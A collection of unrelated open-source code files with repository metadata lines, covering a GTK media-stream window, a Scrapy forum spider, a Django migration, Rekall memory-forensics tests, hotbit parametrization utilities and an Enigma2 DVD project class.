win.set_transient_for(self.window)
win.set_modal(True)
win.set_position(Gtk.WindowPosition.CENTER_ON_PARENT)
win.set_decorated(False)
text = Gtk.Label("Please wait...")
win.add(text)
text.show()
win.show_now()
return win
def on_drag_drop(self, treeview, context, x, y, time):
treeview.stop_emission("drag_drop")
selec = treeview.get_selection()
model, treeiter = selec.get_selected()
data = []
for d in model[treeiter]:
data.append(d)
drop_info = treeview.get_dest_row_at_pos(x, y)
src_iter = self.tree_filter.convert_iter_to_child_iter(treeiter)
drag(data, drop_info, self.db, model, src_iter)
context.finish(True, True, time)
self.db.save()
return
def pl_file_selecter(self):
dial = Gtk.FileChooserDialog("Choose destination file",
self.window,
Gtk.FileChooserAction.SAVE,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE, Gtk.ResponseType.OK
))
filt = Gtk.FileFilter()
filt.set_name("pls")
filt.add_pattern("*.pls")
dial.add_filter(filt)
filt = Gtk.FileFilter()
filt.set_name("m3u")
filt.add_pattern("*.m3u")
dial.add_filter(filt)
response = dial.run()
file = dial.get_filename()
ext = dial.get_filter().get_name()
dial.destroy()
if response == Gtk.ResponseType.OK:
file_ext = file.split(".")[-1]
if file_ext.lower() != ext:
file = "{}.{}".format(file, ext)
if path.isfile(file):
dial = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"{}\n\nFile already exists, overwrite ?".format(file)
)
response = dial.run()
dial.destroy()
if response != Gtk.ResponseType.OK:
return None
return file
def on_export(self, menu_item):
file = self.pl_file_selecter()
self.db.export(file)
return
def on_export_folder(self, menu_item):
file = self.pl_file_selecter()
treeiter = self.selection.get_selected()[1]
f_path = self.tree_filter.get_path(treeiter)
db_path = self.tree_filter.convert_path_to_child_path(f_path)
self.db.export(file, db_path)
return
| Llamatron2112/streams | mainwindow.py | Python | gpl-3.0 | 24,045 |
from flask import Flask
app = Flask(__name__)
from app import vizarvin
| arvinsahni/ml4 | flask/app/__init__.py | Python | mit | 73 |
# -*- coding: utf-8 -*-
import scrapy
from topsage.items import ComputerItem
class ComputerSpider(scrapy.Spider):
name = "computer"
allowed_domains = ["club.topsage.com"]
start_urls = (
'http://club.topsage.com/forum-49-1.html',
)
def parse(self, response):
for path in response.xpath('//*[contains(@id, "forum_")]/table//td/h2/a/@href').extract():
yield scrapy.Request(response.urljoin(path), self.parse_list)
def parse_list(self, response):
next_path = response.xpath('//*[@id="fd_page_bottom"]//a[@class="nxt"]/@href').extract_first()
if next_path is not None:
yield scrapy.Request(response.urljoin(next_path), self.parse_list)
for path in response.xpath('//table[@id="threadlisttableid"]/tbody/tr/th/a[contains(@href, "topsage")]/@href').extract():
yield scrapy.Request(response.urljoin(path), self.parse_post)
def parse_post(self, response):
post_title = response.xpath('//*[@id="thread_subject"]/a/text()').extract_first()
for a_dom in response.xpath('//div[@class="pct"]//a'):
yield ComputerItem(post_url=response.url, post_title=post_title,
url=a_dom.xpath('@href').extract_first(),
name=a_dom.xpath('text()').extract_first())
| JayvicWen/Crawler | topsage/topsage/spiders/computer.py | Python | mit | 1,305 |
from datetime import datetime
from dateutil.relativedelta import relativedelta
class GithubDatePoints(object):
MAX_HEIGHT = 7
MAX_WIDTH = 51
def __init__(self, pixel_set):
self.__pixel_set = self.__normalize_pixel_set(pixel_set)
self.__datetime_start_point = self.get_datetime_start_point()
def __normalize_pixel_set(self, pixel_set):
size = min(len(pixel_set), self.MAX_HEIGHT)
pixel_set = pixel_set[:size]
for i in range(size):
pixel_set[i] = pixel_set[i][:self.MAX_WIDTH]
return pixel_set
def get_datetime_start_point(self):
date_point = datetime.today()
date_point = date_point + relativedelta(weeks=1)
weekday = date_point.weekday()
if weekday != 6:
date_point = date_point - relativedelta(days=weekday, years=1)
return date_point
def get_date_points(self):
dates = []
for rows in range(len(self.__pixel_set)):
for col in range(len(self.__pixel_set[rows])):
if self.__pixel_set[rows][col] != 0:
dates.append(self.__datetime_start_point +
relativedelta(weeks=col, days=rows))
return dates
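# Hypothetical usage sketch: each non-zero cell [row][col] of the pixel set
# becomes one date at (start point + col weeks + row days), so columns step
# through weeks and rows through days of the contribution graph.
#
#     points = GithubDatePoints([[1, 0, 1],
#                                [0, 1, 0]])
#     for d in points.get_date_points():
#         print(d)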
| ufocoder/py-GithubArt | github_art/datepoints.py | Python | mit | 1,247 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'FederalBudget.subvention_performance'
db.alter_column(u'mo_federalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')())
# Adding field 'DepartamentAgreement.start_year'
db.add_column(u'mo_departamentagreement', 'start_year',
self.gf('django.db.models.fields.DateField')(default=datetime.datetime(2014, 2, 13, 0, 0), blank=True),
keep_default=False)
# Adding field 'DepartamentAgreement.finish_year'
db.add_column(u'mo_departamentagreement', 'finish_year',
self.gf('django.db.models.fields.DateField')(default=datetime.datetime(2014, 2, 13, 0, 0), blank=True),
keep_default=False)
# Changing field 'RegionalBudget.subvention_performance'
db.alter_column(u'mo_regionalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')())
def backwards(self, orm):
# Changing field 'FederalBudget.subvention_performance'
db.alter_column(u'mo_federalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')(null=True))
# Deleting field 'DepartamentAgreement.start_year'
db.delete_column(u'mo_departamentagreement', 'start_year')
# Deleting field 'DepartamentAgreement.finish_year'
db.delete_column(u'mo_departamentagreement', 'finish_year')
# Changing field 'RegionalBudget.subvention_performance'
db.alter_column(u'mo_regionalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')(null=True))
models = {
'mo.departamentagreement': {
'Meta': {'object_name': 'DepartamentAgreement'},
'agreement_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 2, 13, 0, 0)', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']", 'null': 'True', 'blank': 'True'}),
'num': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 2, 13, 0, 0)', 'blank': 'True'}),
'subvention': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.Subvention']", 'null': 'True', 'blank': 'True'})
},
'mo.federalbudget': {
'Meta': {'object_name': 'FederalBudget'},
'adm_coef': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sub_orph_home': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sub_sum': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'subvention_performance': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'mo.mo': {
'Meta': {'object_name': 'MO'},
'common_amount': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_economy': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_percentage': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_spent': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'creation_form': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '24', 'null': 'True', 'blank': 'True'}),
'has_trouble': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'home_orphans': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048'})
},
'mo.orphan': {
'Meta': {'object_name': 'Orphan'},
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'have_home': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_privilege': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'mo.peopleamount': {
'Meta': {'object_name': 'PeopleAmount'},
'deals': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'future_queue_by_list': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'future_unhome_orphan': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'future_unhome_orphan_14_18': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']", 'null': 'True', 'blank': 'True'}),
'privilege_people': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'queue_by_list': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'recoverers': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'unhome_orphan': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'unhome_orphan_14_18': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mo.regionalbudget': {
'Meta': {'object_name': 'RegionalBudget'},
'adm_coef': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sub_orph_home': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sub_sum': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'subvention_performance': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'mo.subvention': {
'Meta': {'object_name': 'Subvention'},
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'fed_budget': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.FederalBudget']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reg_budget': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.RegionalBudget']", 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['mo'] | zionist/mon | mon/apps/mo/migrations/0009_auto__chg_field_federalbudget_subvention_performance__add_field_depart.py | Python | bsd-3-clause | 7,925 |
#Modifies the Stage_client_stats collection of Stage_database.
#Changes the client_ts field to ts.
from pymongo import MongoClient
client = MongoClient()
db = client.Stage_database
collection = db.Stage_client_stats
collection.update({}, { '$rename': {"client_ts": "ts"}}, multi=True)
collection = db.Stage_server_stats
collection.update({}, { '$rename': {"client_ts": "ts"}}, multi=True)
collection = db.Stage_result_stats
collection.update({}, { '$rename': {"client_ts": "ts"}}, multi=True)
| joshzarrabi/e-mission-server | bin/historical/migrations/rename_client_ts_to_ts.py | Python | bsd-3-clause | 499 |
#!python3
"""
This script downloads the favicons
Usage:
python3 update_alexa path/to/data.csv
"""
import os
import requests
favicon_path = os.path.join(os.path.dirname(__file__), "..", "icons")
def download_favicons(links):
for link in links:
netloc = link['netloc']
url = 'http://' + netloc
new_favicon_path = os.path.join(favicon_path, netloc + ".ico")
if not os.path.exists(new_favicon_path):
try:
print(url)
response = requests.get(
"https://realfavicongenerator.p.rapidapi.com/favicon/icon",
params={'platform': 'desktop', "site": url},
headers={'X-Mashape-Key': os.environ.get("mashape_key")}
)
except:
pass
else:
if response:
with open(new_favicon_path, 'wb') as f:
f.write(response.content)
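# Hypothetical call (the only requirement on `links` is a "netloc" key per
# entry, and the mashape_key environment variable must be set):
#
#     download_favicons([{'netloc': 'example.com'}, {'netloc': 'example.org'}])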
| engineerapart/TheRemoteFreelancer | docs/scripts/download_favicons.py | Python | unlicense | 964 |
from builtins import object
import binascii
import mock
from rekall import testlib
from rekall.plugins.tools import dynamic_profiles
class MockAddressResolver(object):
def __init__(self, name_map):
self.name_map = name_map
def format_address(self, address):
if address == None:
return ""
return self.name_map.get(address, "")
class TestDynamicProfile(testlib.RekallBaseUnitTestCase):
"""Tests the dynamic profile mechanism."""
TEST_CASES = [
dict(
expected={"$out": 0x20},
mode="AMD64",
# Taken from Windows 7 x64
offset=0xf800029eb5d0,
data=('48895c240848896c24104889742418574883ec2033ff418bf08bea488bd'
'948393975218d572833c941b848546162e80d4602004889034885c07504'
'32c0eb49bf01000000488b1b33d2448d4228488bcbe86b27efff83630c0'
'00bfe893bc7430880000000c743107f000000896b04e80583e9ff4885c0'
'750a488bcbe8f0feffffebb948894320b001488b5c2430'),
example="""
0xf800029eb63e 0x6e e80583e9ff call 0xf80002883948 nt!RtlpAllocateSecondLevelDir
0xf800029eb643 0x73 4885c0 test rax, rax
0xf800029eb646 0x76 750a jne 0xf800029eb652 nt!RtlCreateHashTable+0x82
0xf800029eb648 0x78 488bcb mov rcx, rbx
0xf800029eb64b 0x7b e8f0feffff call 0xf800029eb540 nt!RtlDeleteHashTable
0xf800029eb650 0x80 ebb9 jmp 0xf800029eb60b nt!RtlCreateHashTable+0x3b
0xf800029eb652 0x82 48894320 mov qword ptr [rbx + 0x20], rax
""",
rules=[
{'mnemonic': 'CALL',
'comment': 'nt!RtlpAllocateSecondLevelDir'},
{'mnemonic': 'MOV',
'operands': [{'disp': "$out", 'base': '$rbx'},
{'type': 'REG', 'reg': 'RAX'}]},
],
# Used to pre-seed the address resolver with symbol names for
# testing.
name_map={
0xf80002883948: ["nt!RtlpAllocateSecondLevelDir"],
},
),
# Example from MiSessionInsertImage()
# http://gate.upm.ro/os/LABs/Windows_OS_Internals_Curriculum_Resource_Kit-ACADEMIC/WindowsResearchKernel-WRK/WRK-v1.2/base/ntos/mm/sessload.c
dict(
# Taken from Windows 8 x64 dis "nt!MiSessionInsertImage"
offset=0xf801ea55f680,
data=('48895c240848896c2410488974241857415641574883ec20498bf0488bea'
'488bf941be5000000041b84d6d4869b900020000418bd6e856091200488b'
'd84885c00f84fee60900458bc633d2488bc8e89d03f3ffc7433001000000'
'4883cf0348897b20654c8b342588010000498b86b8000000488b88f00300'
'008b41084c8db9f80b0000488d7968498bd7498bce48896b38894334e8ef'
'16f7ff4c8b1f4c3bdf'),
rules=[
{'mnemonic': 'MOV', 'operands': [
{'type': 'REG', 'reg': '$RDI'},
{'type': 'REG', 'reg': 'RCX'}]},
{'mnemonic': 'CALL',
'comment': 'nt!ExAllocatePoolWithTag'},
{'mnemonic': 'MOV', 'operands': [
{'type': 'REG', 'reg': '$RBX'},
{'type': 'REG', 'reg': 'RAX'}]},
# RtlZeroMemory (NewImage, sizeof(IMAGE_ENTRY_IN_SESSION));
{'mnemonic': 'CALL', 'comment': 'nt!memset'},
# NewImage->ImageCountInThisSession = 1;
{'mnemonic': 'MOV', 'operands': [
{'disp': "$ImageCountInThisSession",
'base': '$RBX', 'type': 'MEM'},
{'address': 1, 'type': 'IMM'}]},
# NewImage->Address = BaseAddress;
{'mnemonic': 'MOV', 'operands': [
{'disp': "$Address",
'base': '$RBX', 'type': 'MEM'},
{'type': 'REG', 'reg': '$RDI'}]},
],
name_map={
0xf801ea680010: ["nt!ExAllocatePoolWithTag"],
0xf801ea48fa70: ["nt!memset"],
},
expected={"$Address": 0x20, "$ImageCountInThisSession": 0x30},
),
]
def testDynamicProfile(self):
for case in self.TEST_CASES:
self.session = mock.Mock(
wraps=self.MakeUserSession(),
address_resolver=MockAddressResolver(
case.get("name_map", {}))
)
matcher = dynamic_profiles.DisassembleMatcher(
mode=case.get("mode", "AMD64"),
rules=case["rules"],
session=self.session)
match = matcher.Match(offset=case.get("offset", 0),
data=binascii.unhexlify(case["data"]))
for k, v in case["expected"].items():
self.assertEqual(match[k], v)
| google/rekall | rekall-core/rekall/plugins/tools/dynamic_profiles_test.py | Python | gpl-2.0 | 5,057 |
from xudd.lib.server import Server
from xudd.lib.http import HTTP
from xudd.lib.wsgi import WSGI
from xudd.hive import Hive
import logging
def wsgi_app(environ, start_response):
response = start_response(200, {'Content-Type': 'text/plain'}.items())
response('Hello World!')
def serve():
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('xudd.hive').setLevel(logging.INFO)
logging.getLogger('xudd.actor').setLevel(logging.INFO)
hive = Hive()
wsgi_id = hive.create_actor(WSGI, app=wsgi_app)
http_id = hive.create_actor(HTTP, request_handler=wsgi_id)
server_id = hive.create_actor(Server, request_handler=http_id)
hive.send_message(
to=server_id,
directive='listen')
hive.run()
if __name__ == '__main__':
serve()
| xudd/xudd | xudd/demos/lib-server.py | Python | apache-2.0 | 795 |
from models import Job
from interface import get_all_jobs
def running_jobs(request):
if request.user.is_authenticated():
# hack to get numbers to update
get_all_jobs(request.user.credentials.all())
temp = len(Job.get_running_jobs(user=request.user))
return {"running_jobs": temp}
else:
return {"running_jobs": None}
| crcollins/chemtools-webapp | cluster/context_processors.py | Python | mit | 366 |
from hotbit.parametrization import KSAllElectron
import numpy as np
from box import mix
from box.interpolation import Function
from hotbit.io.fortran import fortran_readline
integrals =['dds','ddp','ddd','pds','pdp','pps','ppp','sds','sps','sss']
def plot_table(parfile,screen=False,s1=None,s2=None,der=0):
""" Plot table. """
import pylab as pl
if s1==None or s2==None:
s1,s2=parfile.split('.')[0].split('_')
if s1==s2:
nel=1
pairs=[(s1,s2)]
else:
nel=2
pairs=[(s1,s2),(s2,s1)]
pl.rc('figure.subplot',wspace=0.0001)
pl.rc('figure.subplot',hspace=0.0001)
rgrid, tables=read_table(parfile,s1,s2)
mx=max( tables[0].flatten() )
for i in range(10):
name=integrals[i]
ax=pl.subplot(5,2,i+1)
for p,(e1,e2) in enumerate(pairs):
if p==1: s='--'
else: s='-'
if der==0:
grid=rgrid
H=tables[p][:,i]
S=tables[p][:,i+10]
elif der==1:
grid=np.linspace(rgrid[0],rgrid[-1],3*len(rgrid))
hf=Function('spline',rgrid,tables[p][:,i])
sf=Function('spline',rgrid,tables[p][:,i+10])
H=np.array([hf(r,der=1) for r in grid])
S=np.array([sf(r,der=1) for r in grid])
pl.plot(grid,H,c='r',ls=s,label='%s%s: H' %(e1,e2))
pl.plot(grid,S,c='b',ls=s,label='%s%s: S' %(e1,e2))
pl.axhline(c='k',ls='--')
pl.title(name,position=(0.9,0.8))
if ax.is_last_row():
pl.xlabel('r (Bohr)')
else:
pl.xticks([],[])
if not ax.is_first_col():
pl.yticks([],[])
pl.ylim(-mx,mx)
pl.xlim(0)
pl.legend(loc='upper left')
if screen:
pl.show()
else:
name='%s_%s_par.png' %(s1,s2)
if der==1:
name='der_'+name
pl.savefig(name)
def compare_tables(parfile1,parfile2,s1=None,s2=None,screen=False):
""" Plot table. """
import pylab as pl
pl.rcParams.update({'legend.fontsize': 5,'legend.linewidth': 0})
if s1==None or s2==None:
s1,s2=parfile1.split('.')[0].split('_')
if s1==s2:
nel=1
pairs=[(s1,s2)]
else:
nel=2
pairs=[(s1,s2),(s2,s1)]
pl.rc('figure.subplot',wspace=0.0001)
pl.rc('figure.subplot',hspace=0.0001)
rgrid1, tables1=read_table(parfile1,s1,s2)
rgrid2, tables2=read_table(parfile2,s1,s2)
mx=max( tables1[0].flatten() )*0.5
for i in range(10):
name=integrals[i]
ax=pl.subplot(5,2,i+1)
for p,(e1,e2) in enumerate(pairs):
if p==1: s='--'
else: s='-'
# first table
pl.plot(rgrid1,tables1[p][:,i],lw=5,c='r',alpha=0.3,ls=s,label='%s%s: H (%s)' %(e1,e2,parfile1))
pl.plot(rgrid1,tables1[p][:,i+10],lw=5,alpha=0.3,c='b',ls=s,label='%s%s: S' %(e1,e2))
# second table
pl.plot(rgrid2,tables2[p][:,i],lw=2,c='r',ls=s,label='%s%s: H (%s)' %(e1,e2,parfile2))
pl.plot(rgrid2,tables2[p][:,i+10],lw=2,c='b',ls=s,label='%s%s: S' %(e1,e2))
pl.axhline(c='k',ls='--')
pl.title(name,position=(0.9,0.8))
if ax.is_last_row():
pl.xlabel('r (Bohr)')
else:
pl.xticks([],[])
if not ax.is_first_col():
pl.yticks([],[])
if ax.is_first_col() and ax.is_first_row():
pl.legend()
pl.ylim(-mx,mx)
pl.xlim(0)
if screen:
pl.show()
else:
pl.savefig('%s_%s_comparison.png' %(s1,s2))
pl.close()
def read_table(parfile,s1,s2):
""" Read parameter table from file parfile for elements with symbols s1 and s2.
return list of tables [s1_s2_table,s2_s1_table] (or only other if s1==s2)
"""
if parfile.find('.skf')>0:
        if parfile != '%s%s.skf' % (s1, s2):
raise NotImplementedError('Comparison assumes filename of type symbol1symbol2.skf.')
rgrid, table12 = read_skf_table('%s%s.skf' %(s1,s2),s1,s2)
rgrid, table21 = read_skf_table('%s%s.skf' %(s2,s1),s2,s1)
table = [table12]
if s1!=s2:
table.append(table21)
else:
f=open(parfile)
nel=[1,2][s1==s2]
tab=mix.find_value(parfile,'%s_%s_table' %(s1,s2),fmt='matrix')
rgrid=tab[:,0]
table=[tab[:,1:]]
if s1!=s2:
tab=mix.find_value(parfile,'%s_%s_table' %(s2,s1),fmt='matrix')
table.append(tab[:,1:])
f.close()
return rgrid, table
def read_skf_table(parfile,s1,s2):
""" Read SlaKo tables from .skf parameter file for elements with symbols s1,s2."""
f=open(parfile)
dx,n = fortran_readline(f)
dx,n = float(dx), int(n)
f.readline()
if s1==s2: #additional line in homonuclear table
f.readline()
table = []
for i in range(n):
line = fortran_readline( f.readline() )
if len(line)>0:
table += [line]
return dx*np.arange(0,n-1), np.array(table)
def tail_smoothening(x,y):
""" For given grid-function y(x), make smooth tail.
Aim is to get (e.g. for Slater-Koster tables and repulsions) smoothly
behaving energies and forces near cutoff region.
    Make it such that y and y' go smoothly exactly to zero at the last point.
    Method: take the largest k (k<=N-3) such that the line through the
            neighboring points y_k and y_(k+1) passes zero below x_(N-1).
            Then fit a third-order polynomial through points y_k, y_(k+1)
            and y_(N-1).
Return:
smoothed y-function on same grid.
"""
if np.all(abs(y)<1E-10):
return y
N=len(x)
xmax=x[-1]
for i in range(N-3,1,-1):
x0i=x[i]-y[i]/( (y[i+1]-y[i])/(x[i+1]-x[i]) )
if x0i<xmax:
k=i
break
if k<N/4:
for i in range(N):
print(x[i],y[i])
raise RuntimeError('Problem with tail smoothening: requires too large tail.')
if k==N-3:
y[-1]=0.0
return y
else:
# g(x)=c2*(xmax-x)**m + c3*(xmax-x)**(m+1) goes through (xk,yk),(xk+1,yk+1) and (xmax,0)
# Try different m if g(x) should change sign (this we do not want)
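        # For m >= 2 both g(xmax) and g'(xmax) vanish by construction;
        # imposing g(x_k)=y_k and g(x_k+1)=y_k+1 gives the closed-form
        # c3 and c2 used below.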
sgn=np.sign(y[k])
for m in range(2,10):
a1, a2=(xmax-x[k])**m, (xmax-x[k])**(m+1)
b1, b2=(xmax-x[k+1])**m, (xmax-x[k+1])**(m+1)
c3=(y[k]-a1*y[k+1]/b1)/(a2-a1*b2/b1)
c2=(y[k]-a2*c3)/a1
for i in range(k+2,N):
y[i]=c2*(xmax-x[i])**2 + c3*(xmax-x[i])**3
y[-1]=0.0 #once more excplicitly
if np.all(y[k:]*sgn>=0):
break
if m==9:
raise RuntimeError('Problems with function smoothening; need for new algorithm?')
return y
def IP_EA(symb,remove_orb,add_orb,remove,add,add_args={}):
""" Return ionization potential and electron affinity for given atom,
and the valence energies of neutral atom.
parameters:
-----------
symb: element symbol
remove_orb: orbital from where to remove atoms (e.g. '2p')
add_orb: orbital from where to add atoms (e.g. '2p')
remove: how many electrons to remove
add: how many electrons to add
(remove and add can be different from 1.0 if DFT should not
be stable to e.g. adding one full electron)
Fit second order curve for 3 points and return IP and EA for full
electron adding and removal.
"""
#from box.data import atom_occupations
atom = KSAllElectron(symb, txt='-', **add_args)
# add electrons -> negative ion
#occu=atom_occupations[symb].copy()
w = 'negative.atom'
occu_add = atom.occu.copy()
occu_add[add_orb] += add
ea = KSAllElectron(symb, configuration=occu_add, restart=w, write=w,
**add_args)
ea.run()
# neutral atom
w = 'neutral.atom'
neutral = KSAllElectron(symb, restart=w, write=w, **add_args)
neutral.run()
valence_energies = neutral.get_valence_energies()
# remove electrons -> positive ion
#occu=atom_occupations[symb].copy()
w = 'positive.atom'
occu_remove = atom.occu.copy()
occu_remove[remove_orb] -= remove
ip = KSAllElectron(symb, configuration=occu_remove, restart=w, write=w,
**add_args)
ip.run()
e0 = neutral.get_energy()
en = ea.get_energy()-e0
ep = ip.get_energy()-e0
# e(x)=e0+c1*x+c2*x**2 =energy as a function of additional electrons
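    # Fitting e(add) - e0 = en and e(-remove) - e0 = ep gives the closed
    # forms below; extrapolating to one full electron then yields
    #   IP = e(-1) - e(0) = -c1 + c2
    #   EA = e(0) - e(+1) = -(c1 + c2)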
c2 = (en+ep*add/remove)/(add*(remove+add))
c1 = (c2*remove**2-ep)/remove
IP = -c1+c2
EA = -(c1+c2)
return IP, EA, neutral
def ionization_potential(symb,remove,electrons=1.0):
""" Return ionization potential of given atom.
parameters:
-----------
symb: element symbol
remove: orbital from where electron is removed (e.g. '2p')
electrons: how many electrons to remove. Can be fractional number
if DFT should not be stable. IP is scaled by
electrons^-1 in the end to extrapolate to electrons=1.
"""
from box.data import atom_occupations
occu=atom_occupations[symb].copy()
# neutral atom
atom=KSAllElectron(symb)
atom.run()
e0=atom.get_energy()
# negative ion
occu[remove]-=electrons
ion=KSAllElectron(symb,occu=occu)
ion.run()
e1=ion.get_energy()
return (e1-e0)/electrons
def electron_affinity(symb,add,electrons=1.0):
""" Return electron affinity of given atom.
parameters:
-----------
symb: element symbol
add: orbital where electron is added (e.g. '2p')
electrons: how many electrons are added. Can be fractional number
if DFT should not be stable. EA is scaled by
electrons^-1 in the end to extrapolate to electrons=1.
"""
from box.data import atom_occupations
occu=atom_occupations[symb].copy()
# neutral atom
atom=KSAllElectron(symb)
atom.run()
e0=atom.get_energy()
# positive ion
occu[add]+=electrons
ion=KSAllElectron(symb,occu=occu)
ion.run()
e1=ion.get_energy()
return (e0-e1)/electrons
if __name__=='__main__':
#plot_table('Au_Au.par',s1='Au',s2='Au',screen=True,der=0)
#compare_tables('Au_Au.par','Au_Au_NR.par',s1='Au',s2='Au',screen=False)
    import pylab as pl
    x=np.array([1,2,3,4,5,6,7,8,9,10])
y=np.array([100,70,30,10,5,2,0.5,0.1,0.05,0.0001])
pl.plot(x,y)
y=tail_smoothening(x,y)
pl.plot(x,y)
pl.show()
| pekkosk/hotbit | hotbit/parametrization/util.py | Python | gpl-2.0 | 10,616 |
from Tools.Directories import fileExists
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigText, ConfigSelection, getConfigListEntry, ConfigSequence, ConfigSubList
import DVDTitle
import xml.dom.minidom
from Tools.Directories import resolveFilename, SCOPE_PLUGINS, SCOPE_FONTS
class ConfigColor(ConfigSequence):
def __init__(self, default = [128,128,128]):
ConfigSequence.__init__(self, seperator = "#", limits = [(0,255),(0,255),(0,255)], default = default)
class ConfigFilename(ConfigText):
def __init__(self):
ConfigText.__init__(self, default = "", fixed_size = True, visible_width = False)
def getMulti(self, selected):
if self.text == "":
return ("mtext"[1-selected:], "", 0)
cut_len = min(len(self.text),40)
filename = (self.text.rstrip("/").rsplit("/",1))[1].encode("utf-8")[:cut_len] + " "
if self.allmarked:
mark = range(0, len(filename))
else:
mark = [filename]
return ("mtext"[1-selected:], filename, mark)
class DVDProject:
MAX_SL = 4480
MAX_DL = 8150
def __init__(self):
self.titles = [ ]
self.target = None
self.settings = ConfigSubsection()
self.settings.name = ConfigText(fixed_size = False, visible_width = 40)
		self.settings.authormode = ConfigSelection(choices = [("menu_linked", _("Linked titles with a DVD menu")), ("just_linked", _("Direct playback of linked titles without menu")), ("menu_seperate", _("Separate titles with a main menu")), ("data_ts", _("Box format data DVD (HDTV compatible)"))])
self.settings.titlesetmode = ConfigSelection(choices = [("single", _("Simple titleset (compatibility for legacy players)")), ("multi", _("Complex (allows mixing audio tracks and aspects)"))], default="multi")
self.settings.output = ConfigSelection(choices = [("iso", _("Create DVD-ISO")), ("dvd", _("Burn DVD"))])
self.settings.isopath = ConfigText(fixed_size = False, visible_width = 40)
self.settings.dataformat = ConfigSelection(choices = [("iso9660_1", ("ISO9660 Level 1")), ("iso9660_4", ("ISO9660 version 2")), ("udf", ("UDF"))])
self.settings.menutemplate = ConfigFilename()
self.settings.vmgm = ConfigFilename()
self.filekeys = ["vmgm", "isopath", "menutemplate"]
self.menutemplate = MenuTemplate()
self.error = ""
self.session = None
def addService(self, service):
title = DVDTitle.DVDTitle(self)
title.addService(service)
self.titles.append(title)
return title
def saveProject(self, path):
from Tools.XMLTools import stringToXML
list = []
list.append('<?xml version="1.0" encoding="utf-8" ?>\n')
list.append('<DreamDVDBurnerProject>\n')
list.append('\t<settings ')
for key, val in self.settings.dict().iteritems():
list.append( key + '="' + str(val.getValue()) + '" ' )
list.append('/>\n')
list.append('\t<titles>\n')
for title in self.titles:
list.append('\t\t<title>\n')
list.append('\t\t\t<path>')
list.append(stringToXML(title.source.getPath()))
list.append('</path>\n')
list.append('\t\t\t<properties ')
audiotracks = []
